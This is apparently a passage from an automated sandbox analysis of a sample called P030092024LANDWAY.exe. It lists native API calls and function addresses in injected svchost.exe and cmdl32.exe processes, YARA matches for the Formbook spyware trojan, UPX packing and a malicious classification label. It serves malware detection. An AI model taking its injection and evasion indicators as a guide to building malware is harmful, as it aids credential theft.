            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902DB0 NtEnumerateKey,7_2_04902DB0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04903D10 NtOpenProcessToken,7_2_04903D10
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902D00 NtSetInformationFile,7_2_04902D00
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04903D70 NtOpenThread,7_2_04903D70
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902EA0 NtAdjustPrivilegesToken,7_2_04902EA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902E30 NtWriteVirtualMemory,7_2_04902E30
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902F90 NtProtectVirtualMemory,7_2_04902F90
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902FA0 NtQuerySection,7_2_04902FA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902F60 NtCreateProcessEx,7_2_04902F60
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902AB0 NtWaitForSingleObject,7_2_04902AB0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04902B80 NtQueryInformationFile,7_2_04902B80
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_02728B30 NtCreateFile,7_2_02728B30
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_02728E40 NtClose,7_2_02728E40
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_02728FA0 NtAllocateVirtualMemory,7_2_02728FA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_02728CA0 NtReadFile,7_2_02728CA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_02728DA0 NtDeleteFile,7_2_02728DA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004184C32_2_004184C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E9132_2_0042E913
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029802_2_00402980
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012002_2_00401200
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032802_2_00403280
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FD4E2_2_0040FD4E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FD532_2_0040FD53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025C02_2_004025C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041669E2_2_0041669E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004166A32_2_004166A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF732_2_0040FF73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DFF32_2_0040DFF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0388739A2_2_0388739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F02_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039003E62_2_039003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F132D2_2_038F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D34C2_2_0382D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA3522_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A02_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C02_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E02742_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384B1B02_2_0384B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039001AA2_2_039001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F81CC2_2_038F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038301002_2_03830100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA1182_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387516C2_2_0387516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F1722_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390B16B2_2_0390B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF0CC2_2_038EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C02_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F70E92_2_038F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF0E02_2_038FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF7B02_2_038FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C02_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038647502_2_03864750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038407702_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F16CC2_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C6E02_2_0385C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039005912_2_03900591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DD5B02_2_038DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038405352_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F75712_2_038F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EE4F62_2_038EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF43F2_2_038FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F24462_2_038F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038314602_2_03831460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FB802_2_0385FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F6BD72_2_038F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387DBF92_2_0387DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB402_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFB762_2_038FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA802_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DDAAC2_2_038DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03885AA02_2_03885AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EDAC62_2_038EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFA492_2_038FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7A462_2_038F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B3A6C2_2_038B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A02_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390A9A62_2_0390A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038499502_2_03849950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B9502_2_0385B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038569622_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038268B82_2_038268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038438E02_2_038438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E8F02_2_0386E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD8002_2_038AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038428402_2_03842840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384A8402_2_0384A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841F922_2_03841F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFFB12_2_038FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC82_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384CFE02_2_0384CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFF092_2_038FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03882F282_2_03882F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860F302_2_03860F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4F402_2_038B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852E902_2_03852E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FCE932_2_038FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03849EB02_2_03849EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEEDB2_2_038FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEE262_2_038FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840E592_2_03840E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03858DBF2_2_03858DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FDC02_2_0385FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383ADE02_2_0383ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384AD002_2_0384AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03843D402_2_03843D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F1D5A2_2_038F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7D732_2_038F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0CB52_2_038E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830CF22_2_03830CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFCF22_2_038FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840C002_2_03840C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B9C322_2_038B9C32
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0497E4F67_2_0497E4F6
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498F43F7_2_0498F43F
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_049824467_2_04982446
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048C14607_2_048C1460
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_049905917_2_04990591
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0496D5B07_2_0496D5B0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048D05357_2_048D0535
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_049875717_2_04987571
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_049816CC7_2_049816CC
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048EC6E07_2_048EC6E0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498F7B07_2_0498F7B0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048CC7C07_2_048CC7C0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048F47507_2_048F4750
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048D07707_2_048D0770
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048D70C07_2_048D70C0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0497F0CC7_2_0497F0CC
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_049870E97_2_049870E9
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498F0E07_2_0498F0E0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_049901AA7_2_049901AA
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048DB1B07_2_048DB1B0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_049881CC7_2_049881CC
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048C01007_2_048C0100
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0496A1187_2_0496A118
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_049581587_2_04958158
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0499B16B7_2_0499B16B
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048BF1727_2_048BF172
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0490516C7_2_0490516C
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048D52A07_2_048D52A0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048EB2C07_2_048EB2C0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_049712ED7_2_049712ED
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_049702747_2_04970274
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0491739A7_2_0491739A
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048DE3F07_2_048DE3F0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_049903E67_2_049903E6
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498132D7_2_0498132D
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048BD34C7_2_048BD34C
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498A3527_2_0498A352
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04970CB57_2_04970CB5
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498FCF27_2_0498FCF2
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048C0CF27_2_048C0CF2
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048D0C007_2_048D0C00
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04949C327_2_04949C32
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048E8DBF7_2_048E8DBF
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048EFDC07_2_048EFDC0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048CADE07_2_048CADE0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048DAD007_2_048DAD00
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04981D5A7_2_04981D5A
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048D3D407_2_048D3D40
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04987D737_2_04987D73
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498CE937_2_0498CE93
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048E2E907_2_048E2E90
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048D9EB07_2_048D9EB0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498EEDB7_2_0498EEDB
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498EE267_2_0498EE26
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048D0E597_2_048D0E59
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048D1F927_2_048D1F92
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498FFB17_2_0498FFB1
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048C2FC87_2_048C2FC8
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048DCFE07_2_048DCFE0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498FF097_2_0498FF09
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04912F287_2_04912F28
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048F0F307_2_048F0F30
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04944F407_2_04944F40
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048B68B87_2_048B68B8
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048D38E07_2_048D38E0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048FE8F07_2_048FE8F0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0493D8007_2_0493D800
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048D28407_2_048D2840
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048DA8407_2_048DA840
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048D29A07_2_048D29A0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0499A9A67_2_0499A9A6
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048D99507_2_048D9950
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048EB9507_2_048EB950
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048E69627_2_048E6962
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048CEA807_2_048CEA80
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04915AA07_2_04915AA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0496DAAC7_2_0496DAAC
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0497DAC67_2_0497DAC6
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498FA497_2_0498FA49
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04987A467_2_04987A46
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04943A6C7_2_04943A6C
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048EFB807_2_048EFB80
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04986BD77_2_04986BD7
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04945BF07_2_04945BF0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0490DBF97_2_0490DBF9
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498AB407_2_0498AB40
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0498FB767_2_0498FB76
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_027119207_2_02711920
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_027131B07_2_027131B0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_027131AB7_2_027131AB
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0272B4207_2_0272B420
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0270CA807_2_0270CA80
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0270AB007_2_0270AB00
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0270C8607_2_0270C860
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0270C85B7_2_0270C85B
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_02714FD07_2_02714FD0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0452E4D37_2_0452E4D3
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0452E3B87_2_0452E3B8
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0452E86D7_2_0452E86D
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0452D8D87_2_0452D8D8
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 9_2_050447869_2_05044786
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 9_2_050429669_2_05042966
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 9_2_050429619_2_05042961
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 9_2_0503C0119_2_0503C011
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 9_2_0503C0169_2_0503C016
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 9_2_050410D69_2_050410D6
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 9_2_0505ABD69_2_0505ABD6
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 9_2_0503C2369_2_0503C236
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 9_2_0503A2B69_2_0503A2B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 89 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 268 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 36 times
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: String function: 048BB970 appears 268 times
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: String function: 04917E54 appears 96 times
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: String function: 0494F290 appears 105 times
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: String function: 04905130 appears 36 times
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: String function: 0493EA12 appears 86 times
            Source: P030092024LANDWAY.exe, 00000000.00000003.2198040215.0000000004583000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs P030092024LANDWAY.exe
            Source: P030092024LANDWAY.exe, 00000000.00000003.2198571509.000000000472D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs P030092024LANDWAY.exe
            Source: P030092024LANDWAY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: P030092024LANDWAY.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9933401031783681
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/11
